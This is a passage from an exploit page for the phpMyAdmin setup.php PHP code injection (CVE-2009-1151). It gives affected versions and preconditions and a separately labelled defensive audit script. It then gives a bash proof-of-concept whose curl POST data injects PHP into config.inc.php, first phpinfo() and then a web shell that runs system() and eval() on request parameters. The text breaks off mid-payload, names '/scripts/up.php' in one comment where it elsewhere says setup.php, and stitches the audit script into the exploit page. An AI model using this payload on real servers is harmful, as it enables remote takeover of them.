phpMyAdmin (/scripts/setup.php) PHP code injection

  This exploit code was tested successfully in the following environment:
  phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1;
  Linux kernel 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2);
  Attack preconditions:
  phpMyAdmin version: 2.11.x earlier than 2.11.9.5, or 3.x earlier than 3.1.3.1;
  the vulnerability only applies to phpMyAdmin installations set up through the setup wizard, not to manual installations;
  the administrator must not have deleted the '/config/' subdirectory under the '/phpMyAdmin/' directory, because that is where '/scripts/setup.php' tries to create 'config.inc.php', the file into which the PHP code below is injected.
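As an added hardening check, not part of the original PoC or of the phpMyAdmin project, the POSIX shell script below audits a local phpMyAdmin installation for the preconditions listed above: a version in the affected ranges, and the '/config/' directory and '/scripts/setup.php' still present after the wizard was used. It assumes the installation directory and the version string are passed as its two arguments; the file names and the version cut-offs (2.11.9.5 and 3.1.3.1) are taken from the text above.

```shell
#!/bin/sh
# Added hardening audit (constructed example, not the PoC's own code): reports
# whether a phpMyAdmin install still matches the PMASA-2009-3 preconditions.

# vercmp A B: prints -1, 0 or 1 when dotted version A is lower than, equal to,
# or higher than B. Missing trailing fields count as 0 (3.1.3 == 3.1.3.0).
vercmp() {
    a="$1"; b="$2"
    while [ -n "$a" ] || [ -n "$b" ]; do
        ah="${a%%.*}"; bh="${b%%.*}"
        [ "$a" = "$ah" ] && a="" || a="${a#*.}"
        [ "$b" = "$bh" ] && b="" || b="${b#*.}"
        ah="${ah:-0}"; bh="${bh:-0}"
        if [ "$ah" -lt "$bh" ]; then printf '%s\n' -1; return; fi
        if [ "$ah" -gt "$bh" ]; then printf '%s\n' 1; return; fi
    done
    printf '%s\n' 0
}

# pma_version_vulnerable VERSION: exit 0 when VERSION is in an affected range
# named by the advisory text: 2.11.x before 2.11.9.5, or 3.x before 3.1.3.1.
pma_version_vulnerable() {
    v="$1"
    case "$v" in
        2.11|2.11.*) [ "$(vercmp "$v" 2.11.9.5)" -lt 0 ] ;;
        3|3.*)       [ "$(vercmp "$v" 3.1.3.1)" -lt 0 ] ;;
        *)           return 1 ;;
    esac
}

# pma_setup_exposed DIR: exit 0 when the install at DIR still has both the
# writable config/ directory and the setup script that writes config.inc.php.
pma_setup_exposed() {
    [ -d "$1/config" ] && [ -f "$1/scripts/setup.php" ]
}

# pma_audit DIR VERSION: prints each finding; exit 0 only when nothing is found.
pma_audit() {
    dir="$1"; ver="$2"; bad=0
    if pma_version_vulnerable "$ver"; then
        echo "FINDING: phpMyAdmin $ver is in an affected range (PMASA-2009-3); upgrade"
        bad=1
    fi
    if pma_setup_exposed "$dir"; then
        echo "FINDING: $dir/config/ and $dir/scripts/setup.php are present; remove config/ after setup"
        bad=1
    fi
    [ "$bad" -eq 0 ]
}

# Stand-alone usage: ./pma_audit.sh /var/www/phpMyAdmin 2.11.9.4
if [ "$#" -eq 2 ]; then
    pma_audit "$1" "$2"
fi
```

The version check is the weaker of the two signals: a patched version with `config/` left in place is still a configuration the advisory tells administrators to clean up, which is why `pma_audit` reports the two findings independently.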
  
  Code
  #!/bin/bash
  
  # CVE-2009-1151: phpMyAdmin '/scripts/up.php' PHP Code Injection RCE PoC v0.11
  # by pagvac (gnucitizen.org), 4th June 2009.
  # special thanks to Greg Ose (labs.neohapsis.com) for discovering such a cool vuln,
  # and to str0ke (milw0rm.com) for testing this PoC script and providing feedback!
  
  # PoC script successfully tested on: http://snipurl.com/jhjxx
  # 3) administrator must have NOT deleted the '/config/' directory
  # within the '/phpMyAdmin/' directory. this is because this directory is
  # where '/scripts/setup.php' tries to create 'config.inc.php' which is where
  # our evil PHP code is injected 8)
  
  # more info on: http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
  # http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/
  
  if [[ $# -ne 1 ]]
  then
  echo "usage: ./$(basename $0) <phpMyAdmin_base_URL>"
  echo "i.e.: ./$(basename $0) http://target.tld/phpMyAdmin/"
  exit
  fi
  
  if ! which curl >/dev/null
  then
  echo "sorry but you need curl for this script to work!"
  echo "on Debian/Ubuntu: sudo apt-get install curl"
  exit
  fi
  
  
  function exploit {
  
  postdata="token=$1&action=save&configuration="\
  "a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:23:%22host%27]="\
  "%27%27%3b%20phpinfo%28%29%3b//%22%3bs:9:%22localhost%22%3bs:9:"\
  "%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:"\
  "%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:"\
  "%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"
  
  postdata2="token=$1&action=save&configuration=a:1:"\
  "{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d="\
  "%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3b"\
  "system(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}"\
  "if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval"\
  "(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//"\
  "%22%3bs:9:%22localhost%22%3bs:9:%22extens